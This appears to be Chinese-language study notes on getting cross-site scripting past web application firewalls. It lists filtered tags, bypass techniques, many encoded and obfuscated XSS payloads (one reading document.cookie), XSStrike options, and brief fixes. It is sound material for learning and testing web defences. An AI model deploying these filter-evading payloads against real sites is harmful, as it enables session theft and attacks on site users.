目录
xss绕过
常规WAF绕过思想
标签语法替换
特殊符号干扰
垃圾数据溢出
加密解密算法
结合其他漏洞绕过
常见WAF过滤的标签
<script> <a> <img> <p> <body> <button> <var> <div> <textarea> <keygen> <frameset> <embed> <svg> <math> <video> <iframe> <object> <input> <audio> <select>
绕过方法
可以弹窗的:alert、prompt、confirm,base64加密,编码绕过(安全狗都没有过滤)
绕过的方法有很多比如:
大小写绕过
javascript伪协议
没有分号
Flash
HTML5新标签
Fuzz模糊测试
双层标签绕过
audio标签
<audio src=x onerror=alert(1)>
<audio src=x onerror=prompt(1);>
<audio src=1 href=1 onerror="javascript:alert(1)"></audio>
video标签
<video src=x onerror=prompt(1);>
<video src=x onerror=alert(1)>
div标签
<div style="width:expression(alert(/1/))">1</div> //IE浏览器执行
<div onmouseover%3d'alert%26lpar%3b1%26rpar%3b'>DIV<%2fdiv> //url编码绕过
math标签
<math><a/xlink:href=javascript:prompt(1)>Xss
<math href="javascript:javascript:alert(1)">Xss</math>
button标签
<button onfocus=alert(1) autofocus>
<button/onclick=alert(1) >xss</button>
keygen标签
<keygen/onfocus=prompt(1);>
<keygen onfocus=javascript:alert(1) autofocus>
object标签
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
base64加密:PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
解码:<script>alert(1)</script>
iframe标签
<IFRAME width%3d"420" height%3d"315" frameborder%3d"0" onload%3d"alert(document.cookie)"><%2fIFRAME>
<iframe%2fsrc%3d"data%3atext%2fhtml%3b%26Tab%3bbase64%26Tab%3b,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg%3d%3d">
<iframe srcdoc%3d'%26lt%3bbody onload%3dprompt%26lpar%3b1%26rpar%3b%26gt%3b'>
XSS在线模糊测试平台
https://xssfuzzer.com/fuzzer.html
自动化XSS工具-xsstrike
-h, --help //显示帮助信息
-u, --url //指定目标 URL
--data //POST 方式提交内容
-v, --verbose //详细输出
-f, --file //加载自定义 paload 字典
-t, --threads //定义线程数
-l, --level //爬行深度
-t, --encode //定义 payload 编码方式
--json //将 POST 数据视为 JSON
--path //测试 URL 路径组件
--seeds //从文件中测试、抓取 URL
--fuzzer //测试过滤器和 Web 应用程序防火墙。
--update //更新
--timeout //设置超时时间
--params //指定参数
--crawl //爬行
--proxy //使用代理
--blind //盲测试
--skip //跳过确认提示
--skip-dom //跳过 DOM 扫描
--headers //提供 HTTP 标头
-d, --delay //设置延迟
xss安全修复方法
开启 httponly,输入过滤,输出过滤等
PHP:http://www.zuimoge.com/212.html
JAVA:https://www.cnblogs.com/baixiansheng/p/9001522.html
本文章参考于XSS跨站之WAF绕过